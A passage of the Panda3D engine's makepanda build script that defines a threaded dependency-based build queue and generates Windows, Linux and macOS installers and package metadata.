TargetAdd('_rplight.pyd', input='libp3rplight_igate.obj')
TargetAdd('_rplight.pyd', input='p3rplight_composite1.obj')
TargetAdd('_rplight.pyd', input='libp3interrogatedb.dll')
TargetAdd('_rplight.pyd', input=COMMON_PANDA_LIBS)
TargetAdd('_rplight.pyd', opts=['PYTHON'])
#
# Generate the models directory and samples directory
#
if not PkgSkip("DIRECT") and not RUNTIME and not PkgSkip("EGG"):
model_extensions = ["*.egg"]
# Check if we have access to an flt2egg utility, either self-compiled or on the system.
if ((PkgSkip("PANDATOOL")==0 and GetHost()==GetTarget()) or LocateBinary('flt2egg')):
model_extensions.append("*.flt")
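# For each model found in the loops below, the output target is named either
# "<model>.egg.pz" (when zlib and the deploy tools are enabled and we are not
# building the rtdist) or plain "<model>.egg".  The ".pz" suffix presumably
# denotes a pzip-compressed egg produced by the corresponding build rule.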
for model in GetDirectoryContents("dmodels/src/misc", model_extensions):
if (PkgSkip("ZLIB")==0 and PkgSkip("DEPLOYTOOLS")==0 and not RTDIST):
newname = model[:-4] + ".egg.pz"
else:
newname = model[:-4] + ".egg"
TargetAdd(GetOutputDir()+"/models/misc/"+newname, input="dmodels/src/misc/"+model)
for model in GetDirectoryContents("dmodels/src/gui", model_extensions):
if (PkgSkip("ZLIB")==0 and PkgSkip("DEPLOYTOOLS")==0 and not RTDIST):
newname = model[:-4] + ".egg.pz"
else:
newname = model[:-4] + ".egg"
TargetAdd(GetOutputDir()+"/models/gui/"+newname, input="dmodels/src/gui/"+model)
for model in GetDirectoryContents("models", model_extensions):
if (PkgSkip("ZLIB")==0 and PkgSkip("DEPLOYTOOLS")==0 and not RTDIST):
newname = model[:-4] + ".egg.pz"
else:
newname = model[:-4] + ".egg"
TargetAdd(GetOutputDir()+"/models/"+newname, input="models/"+model)
if not PkgSkip("DIRECT") and not RUNTIME:
CopyAllFiles(GetOutputDir()+"/models/audio/sfx/", "dmodels/src/audio/sfx/", ".wav")
CopyAllFiles(GetOutputDir()+"/models/icons/", "dmodels/src/icons/", ".gif")
CopyAllFiles(GetOutputDir()+"/models/maps/", "models/maps/", ".jpg")
CopyAllFiles(GetOutputDir()+"/models/maps/", "models/maps/", ".png")
CopyAllFiles(GetOutputDir()+"/models/maps/", "models/maps/", ".rgb")
CopyAllFiles(GetOutputDir()+"/models/maps/", "models/maps/", ".rgba")
CopyAllFiles(GetOutputDir()+"/models/maps/", "dmodels/src/maps/", ".jpg")
CopyAllFiles(GetOutputDir()+"/models/maps/", "dmodels/src/maps/", ".png")
CopyAllFiles(GetOutputDir()+"/models/maps/", "dmodels/src/maps/", ".rgb")
CopyAllFiles(GetOutputDir()+"/models/maps/", "dmodels/src/maps/", ".rgba")
#
# Build the rtdist.
#
if (RTDIST):
OPTS=['DIR:direct/src/p3d']
TargetAdd('_panda3d', opts=OPTS, input='panda3d.pdef')
TargetAdd('_coreapi', opts=OPTS, input='coreapi.pdef')
TargetAdd('_thirdparty', opts=OPTS, input='thirdparty.pdef')
#
# If we have a host URL and distributor, we can make .p3d deployment tools.
#
if not PkgSkip("DIRECT") and not PkgSkip("DEPLOYTOOLS") and not RUNTIME and not RTDIST and HOST_URL and DISTRIBUTOR:
OPTS=['DIR:direct/src/p3d']
TargetAdd('packp3d.p3d', opts=OPTS, input='panda3d.pdef')
TargetAdd('pdeploy.p3d', opts=OPTS, input='panda3d.pdef')
TargetAdd('pmerge.p3d', opts=OPTS, input='panda3d.pdef')
TargetAdd('ppackage.p3d', opts=OPTS, input='panda3d.pdef')
TargetAdd('ppatcher.p3d', opts=OPTS, input='panda3d.pdef')
##########################################################################################
#
# Dependency-Based Distributed Build System.
#
##########################################################################################
DEPENDENCYQUEUE=[]
for target in TARGET_LIST:
name = target.name
inputs = target.inputs
opts = target.opts
deps = target.deps
DEPENDENCYQUEUE.append([CompileAnything, [name, inputs, opts], [name], deps, []])
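# Each queue entry has the shape [function, args, targets, deps, altsources]:
# task[0] is the build callable (CompileAnything), task[1] its argument list,
# task[2] the list of targets it produces, task[3] its dependencies, and
# task[4] holds alternate sources (left empty here), as read by AllSourcesReady below.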
def BuildWorker(taskqueue, donequeue):
while True:
try:
task = taskqueue.get(timeout=1)
except:
ProgressOutput(None, "Waiting for tasks...")
task = taskqueue.get()
sys.stdout.flush()
if (task == 0): return
try:
task[0](*task[1])
donequeue.put(task)
except:
donequeue.put(0)
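# BuildWorker runs in each worker thread: it pulls tasks from taskqueue, executes
# them, and reports back on donequeue.  A 0 pulled from taskqueue is the shutdown
# sentinel, and a 0 pushed onto donequeue signals that a task failed, which makes
# ParallelMake abort the build.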
def AllSourcesReady(task, pending):
sources = task[3]
for x in sources:
if (x in pending):
return 0
sources = task[1][1]
for x in sources:
if (x in pending):
return 0
altsources = task[4]
for x in altsources:
if (x in pending):
return 0
return 1
def ParallelMake(tasklist):
# Create the communication queues.
donequeue = queue.Queue()
taskqueue = queue.Queue()
# Build up a table listing all the pending targets
#task = [CompileAnything, [name, inputs, opts], [name], deps, []]
# task[2] = [name]
# task[3] = deps
# The Python tool package, in particular fltegg, seems to throw ParallelMake off.
# As a workaround, the tasklist is divided into two parts: one built in parallel and
# a trailing subset built sequentially.  The most time-consuming part of the process
# is the C++ code generation anyway.
tasklist_seq = []
i = 0
while i < len(tasklist):
if tasklist[i][2][0].endswith('.egg') or tasklist[i][2][0].endswith('.egg.pz'):
break
i += 1
if i < len(tasklist):
tasklist_seq = tasklist[i:]
tasklist = tasklist[:i]
iNumStartingTasks = len(tasklist)
pending = {}
for task in tasklist:
for target in task[2]:
pending[target] = 1
# Create the workers
for slave in range(THREADCOUNT):
th = threading.Thread(target=BuildWorker, args=[taskqueue, donequeue])
th.daemon = True
th.start()
# Feed tasks to the workers.
tasksqueued = 0
while True:
if (tasksqueued < THREADCOUNT):
extras = []
for task in tasklist:
if (tasksqueued < THREADCOUNT) and (AllSourcesReady(task, pending)):
if (NeedsBuild(task[2], task[3])):
tasksqueued += 1
taskqueue.put(task)
else:
for target in task[2]:
del pending[target]
else:
extras.append(task)
tasklist = extras
sys.stdout.flush()
if (tasksqueued == 0): break
donetask = donequeue.get()
if (donetask == 0):
exit("Build process aborting.")
sys.stdout.flush()
tasksqueued -= 1
JustBuilt(donetask[2], donetask[3])
for target in donetask[2]:
del pending[target]
# Kill the workers.
for slave in range(THREADCOUNT):
taskqueue.put(0)
# Make sure there aren't any unsatisfied tasks
if len(tasklist) > 0:
exit("Dependency problems: " + str(len(tasklist)) + " tasks not finished. First task unsatisfied: "+str(tasklist[0][2]))
SequentialMake(tasklist_seq)
def SequentialMake(tasklist):
i = 0
for task in tasklist:
if (NeedsBuild(task[2], task[3])):
task[0](*task[1] + [(i * 100.0) / len(tasklist)])
JustBuilt(task[2], task[3])
i += 1
def RunDependencyQueue(tasklist):
if (THREADCOUNT!=0):
ParallelMake(tasklist)
else:
SequentialMake(tasklist)
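# RunDependencyQueue picks the parallel build when THREADCOUNT is nonzero and the
# sequential build otherwise; the try block below saves the dependency cache before
# re-raising if the build aborts with an exception.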
try:
RunDependencyQueue(DEPENDENCYQUEUE)
except:
SaveDependencyCache()
raise
# Run the test suite.
if RUNTESTS:
cmdstr = BracketNameWithQuotes(SDK["PYTHONEXEC"].replace('\\', '/'))
if sys.version_info >= (2, 6):
cmdstr += " -B"
cmdstr += " -m pytest tests"
if GetVerbose():
cmdstr += " --verbose"
oscmd(cmdstr)
##########################################################################################
#
# The Installers
#
# Under Windows, we can build an 'exe' package using NSIS.
# Under Linux, we can build a 'deb' package or an 'rpm' package.
# Under OS X, we can make a 'dmg' package.
#
##########################################################################################
def MakeInstallerNSIS(file, title, installdir):
if (os.path.isfile(file)):
os.remove(file)
elif (os.path.isdir(file)):
shutil.rmtree(file)
if GetTargetArch() == 'x64':
regview = '64'
else:
regview = '32'
if (RUNTIME):
# Invoke the make_installer script.
AddToPathEnv("PATH", GetOutputDir() + "\\bin")
AddToPathEnv("PATH", GetOutputDir() + "\\plugins")
cmd = sys.executable + " -B -u " + os.path.join("direct", "src", "plugin_installer", "make_installer.py")
cmd += " --version %s --regview %s" % (VERSION, regview)
if GetTargetArch() == 'x64':
cmd += " --install \"$PROGRAMFILES64\\Panda3D\" "
else:
cmd += " --install \"$PROGRAMFILES32\\Panda3D\" "
oscmd(cmd)
shutil.move(os.path.join("direct", "src", "plugin_installer", "p3d-setup.exe"), file)
return
print("Building "+title+" installer at %s" % (file))
if (COMPRESSOR != "lzma"):
print("Note: you are using zlib, which is faster, but lzma gives better compression.")
if (os.path.exists("nsis-output.exe")):
os.remove("nsis-output.exe")
WriteFile(GetOutputDir()+"/tmp/__init__.py", "")
nsis_defs = {
'COMPRESSOR' : COMPRESSOR,
'TITLE' : title,
'INSTALLDIR' : installdir,
'OUTFILE' : '..\\' + file,
'BUILT' : '..\\' + GetOutputDir(),
'SOURCE' : '..',
'PYVER' : SDK["PYTHONVERSION"][6:9],
'REGVIEW' : regview,
}
if GetHost() == 'windows':
cmd = os.path.join(GetThirdpartyBase(), 'win-nsis', 'makensis') + ' /V2'
for item in nsis_defs.items():
cmd += ' /D%s="%s"' % item
else:
cmd = 'makensis -V2'
for item in nsis_defs.items():
cmd += ' -D%s="%s"' % item
cmd += ' "makepanda\installer.nsi"'
oscmd(cmd)
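# A hypothetical invocation of the function above (the real call site, with the
# actual file name and install directory, presumably lives further down in this
# script) might look roughly like:
#   MakeInstallerNSIS("Panda3D-" + VERSION + ".exe", "Panda3D", "C:\\Panda3D-" + VERSION)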
def MakeDebugSymbolArchive(zipname, dirname):
import zipfile
zip = zipfile.ZipFile(zipname, 'w', zipfile.ZIP_DEFLATED)
for fn in glob.glob(os.path.join(GetOutputDir(), 'bin', '*.pdb')):
zip.write(fn, dirname + '/bin/' + os.path.basename(fn))
for fn in glob.glob(os.path.join(GetOutputDir(), 'panda3d', '*.pdb')):
zip.write(fn, dirname + '/panda3d/' + os.path.basename(fn))
for fn in glob.glob(os.path.join(GetOutputDir(), 'plugins', '*.pdb')):
zip.write(fn, dirname + '/plugins/' + os.path.basename(fn))
for fn in glob.glob(os.path.join(GetOutputDir(), 'python', '*.pdb')):
zip.write(fn, dirname + '/python/' + os.path.basename(fn))
for fn in glob.glob(os.path.join(GetOutputDir(), 'python', 'DLLs', '*.pdb')):
zip.write(fn, dirname + '/python/DLLs/' + os.path.basename(fn))
zip.close()
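# MakeDebugSymbolArchive collects the MSVC .pdb files from the output tree into a
# single zip; a hypothetical call might be:
#   MakeDebugSymbolArchive("panda3d-" + VERSION + "-symbols.zip", "panda3d-" + VERSION)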
INSTALLER_DEB_FILE="""
Package: panda3dMAJOR
Version: VERSION
Section: libdevel
Priority: optional
Architecture: ARCH
Essential: no
Depends: DEPENDS
Recommends: RECOMMENDS
Suggests: panda3d-runtime
Provides: panda3d
Conflicts: panda3d
Replaces: panda3d
Maintainer: rdb <me@rdb.name>
Installed-Size: INSTSIZE
Description: Panda3D free 3D engine SDK
Panda3D is a game engine which includes graphics, audio, I/O, collision detection, and other abilities relevant to the creation of 3D games. Panda3D is open source and free software under the revised BSD license, and can be used for both free and commercial game development at no financial cost.
Panda3D's intended game-development language is Python. The engine itself is written in C++, and utilizes an automatic wrapper-generator to expose the complete functionality of the engine in a Python interface.
.
This package contains the SDK for development with Panda3D; install panda3d-runtime for the runtime files.
"""
RUNTIME_INSTALLER_DEB_FILE="""
Package: panda3d-runtime
Version: VERSION
Section: web
Priority: optional
Architecture: ARCH
Essential: no
Depends: DEPENDS
Provides: panda3d-runtime
Maintainer: rdb <me@rdb.name>
Installed-Size: INSTSIZE
Description: Runtime binary and browser plugin for the Panda3D Game Engine
This package contains the runtime distribution and browser plugin of the Panda3D engine. It allows you to view webpages that contain Panda3D content and to run games created with Panda3D that are packaged as .p3d files.
"""
# We're not putting "python" in the "Requires" field,
# since the rpm-based distros don't have a common
# naming for the Python package.
INSTALLER_SPEC_FILE="""
Summary: The Panda3D free 3D engine SDK
Name: panda3d
Version: VERSION
Release: RPMRELEASE
License: BSD License
Group: Development/Libraries
BuildRoot: PANDASOURCE/targetroot
%description
Panda3D is a game engine which includes graphics, audio, I/O, collision detection, and other abilities relevant to the creation of 3D games. Panda3D is open source and free software under the revised BSD license, and can be used for both free and commercial game development at no financial cost.
Panda3D's intended game-development language is Python. The engine itself is written in C++, and utilizes an automatic wrapper-generator to expose the complete functionality of the engine in a Python interface.
This package contains the SDK for development with Panda3D; install panda3d-runtime for the runtime files.
%post
/sbin/ldconfig
%postun
/sbin/ldconfig
%files
%defattr(-,root,root)
/etc/Confauto.prc
/etc/Config.prc
/usr/share/panda3d
/etc/ld.so.conf.d/panda3d.conf
/usr/%_lib/panda3d
""" + PYTHON_SITEPACKAGES + """
/usr/include/panda3d
"""
if not PkgSkip("PVIEW"):
INSTALLER_SPEC_FILE += \
"""/usr/share/applications/pview.desktop
/usr/share/mime-info/panda3d.mime
/usr/share/mime-info/panda3d.keys
/usr/share/mime/packages/panda3d.xml
/usr/share/application-registry/panda3d.applications
"""
RUNTIME_INSTALLER_SPEC_FILE="""
Summary: Runtime binary and browser plugin for the Panda3D Game Engine
Name: panda3d-runtime
Version: VERSION
Release: RPMRELEASE
License: BSD License
Group: Productivity/Graphics/Other
BuildRoot: PANDASOURCE/targetroot
%description
This package contains the runtime distribution and browser plugin of the Panda3D engine. It allows you to view webpages that contain Panda3D content and to run games created with Panda3D that are packaged as .p3d files.
%files
%defattr(-,root,root)
/usr/bin/panda3d
/usr/%_lib/nppanda3d.so
/usr/%_lib/mozilla/plugins/nppanda3d.so
/usr/%_lib/mozilla-firefox/plugins/nppanda3d.so
/usr/%_lib/xulrunner-addons/plugins/nppanda3d.so
/usr/share/mime-info/panda3d-runtime.mime
/usr/share/mime-info/panda3d-runtime.keys
/usr/share/mime/packages/panda3d-runtime.xml
/usr/share/application-registry/panda3d-runtime.applications
/usr/share/applications/*.desktop
"""
# plist file for Mac OSX
Info_plist = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CFBundleIdentifier</key>
<string>%(package_id)s</string>
<key>CFBundleShortVersionString</key>
<string>%(version)s</string>
<key>IFPkgFlagRelocatable</key>
<false/>
<key>IFPkgFlagAuthorizationAction</key>
<string>RootAuthorization</string>
<key>IFPkgFlagAllowBackRev</key>
<true/>
</dict>
</plist>
"""
# FreeBSD pkg-descr
INSTALLER_PKG_DESCR_FILE = """
Panda3D is a game engine which includes graphics, audio, I/O, collision detection, and other abilities relevant to the creation of 3D games. Panda3D is open source and free software under the revised BSD license, and can be used for both free and commercial game development at no financial cost.
Panda3D's intended game-development language is Python. The engine itself is written in C++, and utilizes an automatic wrapper-generator to expose the complete functionality of the engine in a Python interface.
This package contains the SDK for development with Panda3D; install panda3d-runtime for the runtime files.
WWW: https://www.panda3d.org/
"""
# FreeBSD pkg-descr
RUNTIME_INSTALLER_PKG_DESCR_FILE = """
Runtime binary and browser plugin for the Panda3D Game Engine
This package contains the runtime distribution and browser plugin of the Panda3D engine. It allows you to view webpages that contain Panda3D content and to run games created with Panda3D that are packaged as .p3d files.
WWW: https://www.panda3d.org/
"""
# FreeBSD PKG Manifest template file
INSTALLER_PKG_MANIFEST_FILE = """
name: NAME
version: VERSION
arch: ARCH
origin: ORIGIN
comment: "Panda3D free 3D engine SDK"
www: https://www.panda3d.org
maintainer: rdb <me@rdb.name>
prefix: /usr/local
flatsize: INSTSIZEMB
deps: {DEPENDS}
"""
def MakeInstallerLinux():
if not RUNTIME and not PkgSkip("PYTHON"):
PYTHONV = SDK["PYTHONVERSION"].rstrip('dmu')
else:
PYTHONV = "python"
PV = PYTHONV.replace("python", "")
# Clean and set up a directory to install Panda3D into
oscmd("rm -rf targetroot data.tar.gz control.tar.gz panda3d.spec")
oscmd("mkdir --mode=0755 targetroot")
dpkg_present = False
if os.path.exists("/usr/bin/dpkg-architecture") and os.path.exists("/usr/bin/dpkg-deb"):
dpkg_present = True
rpmbuild_present = False
if os.path.exists("/usr/bin/rpmbuild"):
rpmbuild_present = True
if dpkg_present and rpmbuild_present:
print("Warning: both dpkg and rpmbuild present.")
if dpkg_present:
# Invoke installpanda.py to install it into a temporary dir
lib_dir = GetDebLibDir()
if RUNTIME:
InstallRuntime(destdir="targetroot", prefix="/usr", outputdir=GetOutputDir(), libdir=lib_dir)
else:
InstallPanda(destdir="targetroot", prefix="/usr", outputdir=GetOutputDir(), libdir=lib_dir)
oscmd("chmod -R 755 targetroot/usr/share/panda3d")
oscmd("mkdir -m 0755 -p targetroot/usr/share/man/man1")
oscmd("install -m 0644 doc/man/*.1 targetroot/usr/share/man/man1/")
oscmd("dpkg --print-architecture > "+GetOutputDir()+"/tmp/architecture.txt")
pkg_arch = ReadFile(GetOutputDir()+"/tmp/architecture.txt").strip()
if (RUNTIME):
txt = RUNTIME_INSTALLER_DEB_FILE[1:]
else:
txt = INSTALLER_DEB_FILE[1:]
txt = txt.replace("VERSION", DEBVERSION).replace("ARCH", pkg_arch).replace("PV", PV).replace("MAJOR", MAJOR_VERSION)
txt = txt.replace("INSTSIZE", str(GetDirectorySize("targetroot") / 1024))
oscmd("mkdir --mode=0755 -p targetroot/DEBIAN")
oscmd("cd targetroot && (find usr -type f -exec md5sum {} ;) > DEBIAN/md5sums")
if (not RUNTIME):
oscmd("cd targetroot && (find etc -type f -exec md5sum {} ;) >> DEBIAN/md5sums")
WriteFile("targetroot/DEBIAN/conffiles","/etc/Config.prc\n")
WriteFile("targetroot/DEBIAN/postinst","#!/bin/sh\necho running ldconfig\nldconfig\n")
oscmd("cp targetroot/DEBIAN/postinst targetroot/DEBIAN/postrm")
# Determine the package name and the locations that
# dpkg-shlibdeps should look in for executables.
pkg_version = DEBVERSION
if RUNTIME:
pkg_name = "panda3d-runtime"
lib_pattern = "debian/%s/usr/%s/*.so" % (pkg_name, lib_dir)
else:
pkg_name = "panda3d" + MAJOR_VERSION
lib_pattern = "debian/%s/usr/%s/panda3d/*.so*" % (pkg_name, lib_dir)
bin_pattern = "debian/%s/usr/bin/*" % (pkg_name)
# dpkg-shlibdeps looks in the debian/{pkg_name}/DEBIAN/shlibs directory
# and also expects a debian/control file, so we create this dummy set-up.
oscmd("mkdir targetroot/debian")
oscmd("ln -s .. targetroot/debian/" + pkg_name)
WriteFile("targetroot/debian/control", "")
dpkg_shlibdeps = "dpkg-shlibdeps"
if GetVerbose():
dpkg_shlibdeps += " -v"
if RUNTIME:
# The runtime doesn't export any useful symbols, so just query the dependencies.
oscmd("cd targetroot && %(dpkg_shlibdeps)s -x%(pkg_name)s %(lib_pattern)s %(bin_pattern)s*" % locals())
depends = ReadFile("targetroot/debian/substvars").replace("shlibs:Depends=", "").strip()
recommends = ""
else:
pkg_name = "panda3d" + MAJOR_VERSION
pkg_dir = "debian/panda3d" + MAJOR_VERSION
# Generate a symbols file so that other packages can know which symbols we export.
oscmd("cd targetroot && dpkg-gensymbols -q -ODEBIAN/symbols -v%(pkg_version)s -p%(pkg_name)s -e%(lib_pattern)s" % locals())
# Library dependencies are required, binary dependencies are recommended.
# We explicitly exclude libphysx-extras since we don't want to depend on PhysX.
oscmd("cd targetroot && LD_LIBRARY_PATH=usr/%(lib_dir)s/panda3d %(dpkg_shlibdeps)s -Tdebian/substvars_dep --ignore-missing-info -x%(pkg_name)s -xlibphysx-extras %(lib_pattern)s" % locals())
oscmd("cd targetroot && LD_LIBRARY_PATH=usr/%(lib_dir)s/panda3d %(dpkg_shlibdeps)s -Tdebian/substvars_rec --ignore-missing-info -x%(pkg_name)s %(bin_pattern)s" % locals())
# Parse the substvars files generated by dpkg-shlibdeps.
depends = ReadFile("targetroot/debian/substvars_dep").replace("shlibs:Depends=", "").strip()
recommends = ReadFile("targetroot/debian/substvars_rec").replace("shlibs:Depends=", "").strip()
if PkgSkip("PYTHON")==0:
depends += ", " + PYTHONV
recommends += ", python-wxversion, python-profiler (>= " + PV + "), python-pmw, python-tk (>= " + PV + ")"
if PkgSkip("NVIDIACG")==0:
depends += ", nvidia-cg-toolkit"
# Write back the dependencies, and delete the dummy set-up.
txt = txt.replace("DEPENDS", depends.strip(', '))
txt = txt.replace("RECOMMENDS", recommends.strip(', '))
WriteFile("targetroot/DEBIAN/control", txt)
oscmd("rm -rf targetroot/debian")
# Package it all up into a .deb file.
oscmd("chmod -R 755 targetroot/DEBIAN")
oscmd("chmod 644 targetroot/DEBIAN/control targetroot/DEBIAN/md5sums")
if not RUNTIME:
oscmd("chmod 644 targetroot/DEBIAN/conffiles targetroot/DEBIAN/symbols")
oscmd("fakeroot dpkg-deb -b targetroot %s_%s_%s.deb" % (pkg_name, pkg_version, pkg_arch))
elif rpmbuild_present:
# Invoke installpanda.py to install it into a temporary dir
if RUNTIME:
InstallRuntime(destdir="targetroot", prefix="/usr", outputdir=GetOutputDir(), libdir=GetRPMLibDir())
else:
InstallPanda(destdir="targetroot", prefix="/usr", outputdir=GetOutputDir(), libdir=GetRPMLibDir())
oscmd("chmod -R 755 targetroot/usr/share/panda3d")
oscmd("rpm -E '%_target_cpu' > "+GetOutputDir()+"/tmp/architecture.txt")
ARCH = ReadFile(GetOutputDir()+"/tmp/architecture.txt").strip()
pandasource = os.path.abspath(os.getcwd())
if RUNTIME:
txt = RUNTIME_INSTALLER_SPEC_FILE[1:]
else:
txt = INSTALLER_SPEC_FILE[1:]
# Add the binaries in /usr/bin explicitly to the spec file
for base in os.listdir(GetOutputDir() + "/bin"):
txt += "/usr/bin/%s\n" % (base)
# Write out the spec file.
txt = txt.replace("VERSION", VERSION)
txt = txt.replace("RPMRELEASE", RPMRELEASE)
txt = txt.replace("PANDASOURCE", pandasource)
txt = txt.replace("PV", PV)
WriteFile("panda3d.spec", txt)
oscmd("fakeroot rpmbuild --define '_rpmdir "+pandasource+"' --buildroot '"+os.path.abspath("targetroot")+"' -bb panda3d.spec")
if (RUNTIME):
oscmd("mv "+ARCH+"/panda3d-runtime-"+VERSION+"-"+RPMRELEASE+"."+ARCH+".rpm .")
else:
oscmd("mv "+ARCH+"/panda3d-"+VERSION+"-"+RPMRELEASE+"."+ARCH+".rpm .")
oscmd("rm -rf "+ARCH, True)
else:
exit("To build an installer, either rpmbuild or dpkg-deb must be present on your system!")
def MakeInstallerOSX():
if (RUNTIME):
# Invoke the make_installer script.
AddToPathEnv("DYLD_LIBRARY_PATH", GetOutputDir() + "/plugins")
cmdstr = sys.executable + " "
if sys.version_info >= (2, 6):
cmdstr += "-B "
cmdstr += "direct/src/plugin_installer/make_installer.py --version %s" % VERSION
oscmd(cmdstr)
return
dmg_name = "Panda3D-" + VERSION
if not SDK["PYTHONVERSION"].startswith("python2."):
dmg_name += '-py' + SDK["PYTHONVERSION"][6:9]
dmg_name += ".dmg"
import compileall
if (os.path.isfile(dmg_name)): oscmd("rm -f %s" % dmg_name)
if (os.path.exists("dstroot")): oscmd("rm -rf dstroot")
if (os.path.exists("Panda3D-rw.dmg")): oscmd('rm -f Panda3D-rw.dmg')
oscmd("mkdir -p dstroot/base/Developer/Panda3D/lib")
oscmd("mkdir -p dstroot/base/Developer/Panda3D/etc")
oscmd("cp %s/etc/Config.prc dstroot/base/Developer/Panda3D/etc/Config.prc" % GetOutputDir())
oscmd("cp %s/etc/Confauto.prc dstroot/base/Developer/Panda3D/etc/Confauto.prc" % GetOutputDir())
oscmd("cp -R %s/models dstroot/base/Developer/Panda3D/models" % GetOutputDir())
oscmd("cp -R doc/LICENSE dstroot/base/Developer/Panda3D/LICENSE")
oscmd("cp -R doc/ReleaseNotes dstroot/base/Developer/Panda3D/ReleaseNotes")
oscmd("cp -R %s/Frameworks dstroot/base/Developer/Panda3D/Frameworks" % GetOutputDir())
if os.path.isdir(GetOutputDir()+"/plugins"):
oscmd("cp -R %s/plugins dstroot/base/Developer/Panda3D/plugins" % GetOutputDir())
# Libraries that shouldn't be in base, but are instead in other modules.
no_base_libs = ['libp3ffmpeg', 'libp3fmod_audio', 'libfmodex', 'libfmodexL']
for base in os.listdir(GetOutputDir()+"/lib"):
if not base.endswith(".a") and base.split('.')[0] not in no_base_libs:
libname = "dstroot/base/Developer/Panda3D/lib/" + base
# We really need to specify -R in order not to follow symlinks
# On OSX, just specifying -P is not enough to do that.
oscmd("cp -R -P " + GetOutputDir() + "/lib/" + base + " " + libname)
oscmd("mkdir -p dstroot/tools/Developer/Panda3D/bin")
oscmd("mkdir -p dstroot/tools/Developer/Tools")
oscmd("ln -s ../Panda3D/bin dstroot/tools/Developer/Tools/Panda3D")
oscmd("mkdir -p dstroot/tools/etc/paths.d")
# Trailing newline is important, works around a bug in OSX
WriteFile("dstroot/tools/etc/paths.d/Panda3D", "/Developer/Panda3D/bin\n")
oscmd("mkdir -m 0755 -p dstroot/tools/usr/local/share/man/man1")
oscmd("install -m 0644 doc/man/*.1 dstroot/tools/usr/local/share/man/man1/")
for base in os.listdir(GetOutputDir()+"/bin"):
binname = "dstroot/tools/Developer/Panda3D/bin/" + base
# OSX needs the -R argument to copy symbolic links correctly, it doesn't have -d. How weird.
oscmd("cp -R " + GetOutputDir() + "/bin/" + base + " " + binname)
if PkgSkip("PYTHON")==0:
PV = SDK["PYTHONVERSION"][6:9]
oscmd("mkdir -p dstroot/pythoncode/usr/local/bin")
oscmd("mkdir -p dstroot/pythoncode/Developer/Panda3D/panda3d")
oscmd("mkdir -p dstroot/pythoncode/Library/Python/%s/site-packages" % PV)
WriteFile("dstroot/pythoncode/Library/Python/%s/site-packages/Panda3D.pth" % PV, "/Developer/Panda3D")
oscmd("cp -R %s/pandac dstroot/pythoncode/Developer/Panda3D/pandac" % GetOutputDir())
oscmd("cp -R %s/direct dstroot/pythoncode/Developer/Panda3D/direct" % GetOutputDir())
oscmd("ln -s %s dstroot/pythoncode/usr/local/bin/ppython" % SDK["PYTHONEXEC"])
oscmd("cp -R %s/*.so dstroot/pythoncode/Developer/Panda3D/" % GetOutputDir(), True)
oscmd("cp -R %s/*.py dstroot/pythoncode/Developer/Panda3D/" % GetOutputDir(), True)
if os.path.isdir(GetOutputDir()+"/Pmw"):
oscmd("cp -R %s/Pmw dstroot/pythoncode/Developer/Panda3D/Pmw" % GetOutputDir())
compileall.compile_dir("dstroot/pythoncode/Developer/Panda3D/Pmw")
WriteFile("dstroot/pythoncode/Developer/Panda3D/direct/__init__.py", "")
for base in os.listdir("dstroot/pythoncode/Developer/Panda3D/direct"):
if ((base != "extensions") and (base != "extensions_native")):
compileall.compile_dir("dstroot/pythoncode/Developer/Panda3D/direct/"+base)
for base in os.listdir(GetOutputDir()+"/panda3d"):
if base.endswith('.py') or base.endswith('.so'):
libname = "dstroot/pythoncode/Developer/Panda3D/panda3d/" + base
# We really need to specify -R in order not to follow symlinks
# On OSX, just specifying -P is not enough to do that.
oscmd("cp -R -P " + GetOutputDir() + "/panda3d/" + base + " " + libname)
if not PkgSkip("FFMPEG"):
oscmd("mkdir -p dstroot/ffmpeg/Developer/Panda3D/lib")
oscmd("cp -R %s/lib/libp3ffmpeg.* dstroot/ffmpeg/Developer/Panda3D/lib/" % GetOutputDir())
#if not PkgSkip("OPENAL"):
# oscmd("mkdir -p dstroot/openal/Developer/Panda3D/lib")
# oscmd("cp -R %s/lib/libp3openal_audio.* dstroot/openal/Developer/Panda3D/lib/" % GetOutputDir())
if not PkgSkip("FMODEX"):
oscmd("mkdir -p dstroot/fmodex/Developer/Panda3D/lib")
oscmd("cp -R %s/lib/libp3fmod_audio.* dstroot/fmodex/Developer/Panda3D/lib/" % GetOutputDir())
oscmd("cp -R %s/lib/libfmodex* dstroot/fmodex/Developer/Panda3D/lib/" % GetOutputDir())
oscmd("mkdir -p dstroot/headers/Developer/Panda3D/lib")
oscmd("cp -R %s/include dstroot/headers/Developer/Panda3D/include" % GetOutputDir())
if os.path.isfile(GetOutputDir() + "/lib/libp3pystub.a"):
oscmd("cp -R -P %s/lib/libp3pystub.a dstroot/headers/Developer/Panda3D/lib/" % GetOutputDir())
if os.path.isdir("samples"):
oscmd("mkdir -p dstroot/samples/Developer/Examples/Panda3D")
oscmd("cp -R samples/* dstroot/samples/Developer/Examples/Panda3D/")
oscmd("chmod -R 0775 dstroot/*")
DeleteVCS("dstroot")
DeleteBuildFiles("dstroot")
# We need to be root to perform a chown. Bleh.
# Fortunately PackageMaker does it for us, on 10.5 and above.
#oscmd("chown -R root:admin dstroot/*", True)
oscmd("mkdir -p dstroot/Panda3D/Panda3D.mpkg/Contents/Packages/")
oscmd("mkdir -p dstroot/Panda3D/Panda3D.mpkg/Contents/Resources/en.lproj/")
pkgs = ["base", "tools", "headers"]
if not PkgSkip("PYTHON"): pkgs.append("pythoncode")
if not PkgSkip("FFMPEG"): pkgs.append("ffmpeg")
#if not PkgSkip("OPENAL"): pkgs.append("openal")
if not PkgSkip("FMODEX"): pkgs.append("fmodex")
if os.path.isdir("samples"): pkgs.append("samples")
for pkg in pkgs:
identifier = "org.panda3d.panda3d.%s.pkg" % pkg
plist = open("/tmp/Info_plist", "w")
plist.write(Info_plist % { "package_id" : identifier, "version" : VERSION })
plist.close()
if not os.path.isdir("dstroot/" + pkg):
os.makedirs("dstroot/" + pkg)
if OSXTARGET and OSXTARGET <= (10, 5):
target = '--target %d.%d' % (OSXTARGET)
else:
target = ''
if os.path.exists("/usr/bin/pkgbuild"):
# This new package builder is used in Lion and above.
cmd = '/usr/bin/pkgbuild --identifier ' + identifier + ' --version ' + VERSION + ' --root dstroot/' + pkg + '/ dstroot/Panda3D/Panda3D.mpkg/Contents/Packages/' + pkg + '.pkg'
# In older versions, we use PackageMaker. Apple keeps changing its location.
elif os.path.exists("/Developer/usr/bin/packagemaker"):
